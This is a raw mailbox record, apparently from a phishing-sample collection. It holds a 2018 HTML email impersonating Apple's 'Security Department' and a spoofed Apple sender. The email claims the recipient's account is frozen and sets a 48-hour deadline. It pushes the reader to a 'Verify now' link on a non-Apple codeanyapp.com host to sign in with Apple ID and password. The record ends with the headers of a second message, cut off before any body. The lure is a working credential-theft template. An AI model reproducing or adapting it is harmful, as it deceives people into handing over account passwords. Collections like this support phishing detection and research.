From: =?UTF-8?B?QXBwbGVJRA==?= <noreply@e.apple.com>
MIME-Version: 1.0;
Content-type: multipart/mixed; boundary="--G9nW6jHaeF"
Message-Id: <E1fgBNx-0003In-Ok@klokanek.stable.cz>
Sender: "Stable.cz zakaznicky ucet" <zakaznik@klokanek.stable.cz>
Date: Thu, 19 Jul 2018 18:02:33 +0200
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 534

----G9nW6jHaeF
Content-type: text/html; charset="utf-8"
Content-Transfer-Encoding: 8bit


<table border="0" width="97%" cellspacing="0" cellpadding="0" bgcolor="#CCCCCC">
<tbody>
<tr>
<td width="4"></td>
<td width="1074" align="center"></td>
<td></td>
</tr>
<tr>
<td width="4"></td>
<td width="1074" align="center">
<table bgcolor="#ffffff" cellpadding="0" cellspacing="0" border="0" align="center" width="560" style="line-height:21px; color:rgb(68,68,68); font-family:Calibri,sans-serif; font-size:15px; font-style:normal; font-variant:normal; font-weight:normal; letter-spacing:normal; orphans:auto; text-align:start; text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; background-color:rgb(255,255,255)">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td colspan="2" style="line-height:21px"><img data-imagetype="External" border="0" alt="" width="560" height="37" style="line-height:21px; display:block" src="http://zupimages.net/up/13/49/ig69.png"></td>
</tr>
<tr style="line-height:21px">
<td width="508" style="line-height:21px">
<table cellpadding="0" cellspacing="0" border="0" width="508" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:27px; padding-top:36px; padding-bottom:0px">
<div style="line-height: 1em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 18px; color: rgb(102, 102, 102);">
<font size="3">Dear Customer,</font></div>
</td>
</tr>
</tbody>
</table>
</td>
<td align="right" width="52" style="line-height:21px">
<table cellpadding="0" cellspacing="0" border="0" width="52" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:0px; padding-right:30px; padding-top:32px; padding-bottom:0px">
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style="line-height:21px">
<td colspan="2" height="24" style="line-height:21px"></td>
</tr>
<tr style="line-height:21px">
<td colspan="2" style="line-height:21px">
<table cellpadding="0" cellspacing="0" border="0" width="560" height="26" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:30px; padding-top:0px; padding-bottom:0px">
<div style="line-height: 1.4em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; color: rgb(102, 102, 102);">
This is an automatic message sent by our security system to you let you know that you have <font color="#0088CC">48 hours</font> to confirm your account information.</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style="line-height:21px">
<td colspan="2" height="21" style="line-height:21px"></td>
</tr>
<tr style="line-height:21px">
<td colspan="2" style="line-height:21px">
<table cellpadding="0" cellspacing="0" border="0" width="560" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:30px; padding-top:0px; padding-bottom:0px">
<div style="line-height: 1.4em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; color: rgb(102, 102, 102);">
<b><font style="font-size:9pt">Your Apple account has been frozen because we are unable to validate your account information.</font></b></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style="line-height:21px">
<td colspan="2" height="24" style="line-height:21px"></td>
</tr>
<tr style="line-height:21px">
<td colspan="2" style="line-height:21px">
<table cellpadding="0" cellspacing="0" border="0" width="560" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:30px; padding-top:0px; padding-bottom:0px">
<div style="line-height: 1.4em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; color: rgb(102, 102, 102);">
We've noticed that some of your account information appears to be missing or incorrect. <br>
We need to verify your account information in order to continue using your Apple ID, Please Verify your account information by clicking on the link below and then sign in using your Apple ID and password. </div>
</td>
</tr>
</tbody>
</table>
<table cellpadding="0" cellspacing="0" border="0" width="560" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:30px; padding-top:0px; padding-bottom:0px">
<div style="line-height: 1.4em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; color: rgb(102, 102, 102);">
<a href="https://apple-center-confirm.codeanyapp.com/redirect.php" target="_blank" rel="noopener noreferrer" class="x_ecxaapl-link" style="line-height:17px; font-weight:normal; text-decoration:none; color:rgb(0,136,204); font-family:'Lucida Grande','Lucida Sans','Lucida Sans Unicode',Arial,Helvetica,Verdana,sans-serif; font-size:12px; font-style:normal; font-variant:normal; letter-spacing:normal; orphans:auto; text-indent:0px; text-transform:none; white-space:normal; widows:auto; word-spacing:0px; background-color:rgb(255,255,255)">Verify now &gt; </a><span style="color: rgb(102, 102, 102); font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 16.7969px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; background-color: rgb(255, 255, 255); float: none; display: inline !important;">.</span><br>
</div>
</td>
</tr>
</tbody>
</table>
<table cellpadding="0" cellspacing="0" border="0" width="560" style="line-height:21px">
<tbody style="line-height:21px">
<tr style="line-height:21px">
<td align="left" style="line-height:21px; padding-left:30px; padding-right:30px; padding-top:0px; padding-bottom:0px">
<div style="line-height: 1.4em; font-family: &quot;Lucida Grande&quot;, &quot;Lucida Sans&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, Verdana, sans-serif, serif, EmojiFont; font-size: 12px; color: rgb(102, 102, 102);">
We apologise for any inconvenience caused.<br>
<br>
Your sincerely,<br>
<br>
Apple Security Department</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style="line-height:21px">
<td colspan="2" style="line-height:21px; padding-top:11px"><img data-imagetype="External" alt="" border="0" width="560" height="10" style="line-height:21px; display:block" src="http://zupimages.net/up/13/49/lfnu.png"></td>
</tr>
</tbody>
</table>
</td>
<td></td>
</tr>
<tr>
<td height="19" width="4"></td>
<td height="19" width="1074">
<p align="center"><font size="1"><font face="Arial" color="#8C8C8C">TM and copyright © 2018 Apple Inc. 1 Infinite Loop, MS 38-DM, Cupertino, CA 52019.<br style="line-height:12px">
</font>All Rights Reserved<font face="Arial" color="#8C8C8C"><span class="x_Apple-converted-space"></span>/<span class="x_Apple-converted-space"></span></font>Keep Informed<font face="Arial" color="#8C8C8C"><span class="x_Apple-converted-space"></span>/<span class="x_Apple-converted-space"></span></font>Privacy Policy<font face="Arial" color="#8C8C8C"><span class="x_Apple-converted-space"></span>/<span class="x_Apple-converted-space"></span></font></font><font size="1">My Apple ID</font></p>
</td>
<td height="19"></td>
</tr>
</tbody>
</table>
----G9nW6jHaeF


From jose@monkey.org Thu Jul 19 23:15:28 2018 +0000
Return-Path: szabo.attila8@mentok.hu
Delivered-To: jose@monkey.org
X-FDA: 74403731136.02.chair23_128988235f812
X-Spam-Summary: 10,1,0,af150c5fbe54cc45,d41d8cd98f00b204,szabo.attila8@mentok.hu,,RULES_HIT:10:41:72:355:379:582:960:962:967:973:978:983:988:989:1021:1029:1152:1189:1208:1221:1256:1260:1263:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1544:1560:1571:1575:1588:1589:1592:1594:1691:1711:1714:1730:1749:1777:1792:2198:2199:2525:2526:2527:2528:2561:2564:2682:2685:2693:2859:2890:2902:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3865:3866:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4321:4362:4379:4552:5007:6117:6261:6658:6669:6678:7688:8583:8603:8957:9025:9163:9388:9868:10004:10026:10049:10197:10241:10243:10346:10919:11245:11656:11658:11914:12043:12295:12438:12555:12895:13019:13060:13139:13163:13229:13237:13439:14181:14659:14721:14885:21326:21433:21450:21451:21499:21627:21796:30001:30022:30037:30054:30069:30070,0,RBL:84.206.8.194:@mentok.hu:.lbl8.mailshell.net-62.8.112.100 64.201.201.201,CacheIP:none,Bayesi
X-HE-Tag: chair23_128988235f812
X-Filterd-Recvd-Size: 7188
Received: from mailgw.mentok.hu (mailgw.mentok.hu [84.206.8.194])
	by imf03.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 19 Jul 2018 23:15:27 +0000 (UTC)
X-AuditID: 54ce08c2-e69ff70000000fda-f0-5b511b8da9e4
To: undisclosed-recipients:;
